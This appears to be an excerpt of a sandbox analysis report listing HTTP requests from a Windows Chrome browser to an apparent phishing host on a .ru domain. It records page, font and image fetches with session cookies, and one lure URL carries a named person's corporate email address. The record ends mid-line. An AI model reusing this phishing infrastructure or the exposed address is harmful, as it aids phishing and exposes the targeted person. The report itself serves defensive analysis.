              Source: global trafficHTTP traffic detected: GET /pbGQlY127p6h0ts0giGGM6xrw HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imt0TFhad2ZVSzZVcmpaVDJSMFpLaHc9PSIsInZhbHVlIjoidDJUOFRVcUdRS0FGSVR5VWJJTGxQUFlrWktpSVBqME10amZYZlVDeGgwTE1BYmRQMnpqVWVXL2RNdDN6M3hRQ0pJSVZ5SHJ2RGUwYThIMzN2WFZ0RFBkKzU1TDhvRVdaSW1Da3FQQnRBMVFSV3ZUbXQ1SUpwdE9BZ0hhSlJqWjYiLCJtYWMiOiI3MjliNzBiOGMxYWM1YTlhMjJkZjMyMWZiZjFhYzdkOTdmN2VmMDQ0ZjEzODViZDg0MTQzN2JkMmJkN2ZkZjBmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik52OHRmTUVGb1ljVG1NN09SSTEyc1E9PSIsInZhbHVlIjoibUZYbWRKTjk0SnpQWDhaUUl1Q3lOb05MMFIybTBKKzBhR2pKNitEcERjeUw3R0czYnNhOGhBZkhLMjVhenY1NVpIVGZaOWVXQXpER1FEMnVPbVhLL2IzbTlaSWN6SnEwa3dNQjVUNzhXd0lHTGMzS09SVDFYbCs0SWZCVnBib0YiLCJtYWMiOiIwZWI0M2M5YjI0NjJmYTFiMmIyNDM0ZjgzMjE4YjRjMDY4ZTZjODUxMjcyZmQxNmY4Njk0MzcwM2JjMWM5YmRkIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /hIzc6w/?RDian.hancock@baesystems.com HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://f8gxf.oritelos.ru/hIzc6w/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkVkays2WFhwVlVleW43YnhncG4zUXc9PSIsInZhbHVlIjoiOEthK05qdG9TS1NuSngyWGxtRUhGbWZuSTlPOGZGVk5OWFdXS0MxenZIU0VLeVFudVJDT1crOSs1bW5iSWNvbDVLYitPbkRqY1M2Z0JwLzE1WG4yRE5wT3lxa2RuTm1QSFRoTkZkUkljakppa2laNm9ueUQyRmZnYW4zWDRtbUYiLCJtYWMiOiI4ZTRlNzcwYWNmZWZlOTRmNjU5OTAwMmZmZjVkNTEwZjQ3Y2QwZGI4ZTZiNWRmZDgxNDZhZDc2ZDYwNDc3NTU0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik13Mms0YjhJVDY2TzArRWxuUmNHQkE9PSIsInZhbHVlIjoiY3B2MjJpbVBobzNzS3JQREw5M1o1RVJubjJYMDJzYlNrWkRJd2o2RFlPMTlrZHdkVHVTamdGcnlyUHdxRlBHaldzdDcwS1JaV25ObmVYYkY1anlLUTFaZW90NXYxZ25LZXFPLzlFanY4R2pscFFKOCtVMTN5L29TQ1dsQklIWkwiLCJtYWMiOiI5YzM2OGM1MjE1YWRjZjFhMjZiN2Q2OWExN2Y0MGFlMTc3M2EwZjdkZDYxMzMzZGQzM2E4ODM4ZjNhODFiZDdjIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://f8gxf.oritelos.ru/hIzc6w/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkM1YmkzSHJFY3lOdVdXeVZ4QjVWYmc9PSIsInZhbHVlIjoiU2Jhc00rVGl0OWNMYUlnbzNhUnluelBoaWtjSHB5MExCK0txZ2lZdWgxUUtXS29kWldUa1Y0THhnWFpoZDEwMEkvRU9xb25ob2JBY3ZkRkZBb0tRS2FyTDFBZFhPQW42Y3JXNVM0RlBqWjVLZmhjNlJqUHVpL1B1eGEyVXFJazAiLCJtYWMiOiIxMmI5Y2M0ZTExODY3MWJiM2U4ZGY2ZjBhNjAyMTQyMTQ3ZjhmOTA2MjkxY2UzMDY5NzQ0YjgzOTJlOWY5YzU5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlVSaE1LaUQyZGswWUFKVm9wL1NaZUE9PSIsInZhbHVlIjoiaG92RlUvUGRNcktRUlRTbWZyNkNYYmxiMG9xTGtaVDJvZ1I5emVhbk0zb1ZMYjYxQ25iOXpCc3ZYVHMxR05oWHRSbXhDRTF0MVV1OFdKZmlUM1JGRzNoSWtsN0RvMnVxamRSYmFuR1J0QkRBa0lvcXpSR2MraVFCaWp5a2tyRW8iLCJtYWMiOiJiMGI5MThiZDUwNDQzNWEzMWFhOTE3MjZkOGU2YTViODc1MDk1N2Q4NWRhYjUxNTk3NWNmZTcxYTViNGJlNTExIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /12XCRnloHGipczcdhoCq68920 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /abD8xmKpqXe3def25 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /pqOKTFEEmnh8egHBG34r6Zuv40 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://f8gxf.oritelos.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /yzSSueW3Rlb568gKDHxKxop43 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://f8gxf.oritelos.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /78cJa7D3fK45ClNib8mst60 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://f8gxf.oritelos.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /23rACQ3TWSEp90OaR5XE1xy67 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://f8gxf.oritelos.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://f8gxf.oritelos.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://f8gxf.oritelos.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /89Lx2AXVud2xlUwbPNlje12zdhl4A2IPyz79 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://f8gxf.oritelos.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /efoHxPf1tkQQJ2bQoGNe78ItFgVg4zXAkl97 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://f8gxf.oritelos.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /klpWKk32gxuOs7NipwmTvBAiwrwHsZdCtNCzija15cfNIJA8Jl2SAW0BE2ZBBrAhRNr49wx220 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /klIQ39laQFjey0i6xGLP3ZDteNpdd3cDZBKGgtt891okNrKdibFlqrS1cZWOM1UJUDFXOGwYKo5Fyz230 HTTP/1.1Host: f8gxf.oritelos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; 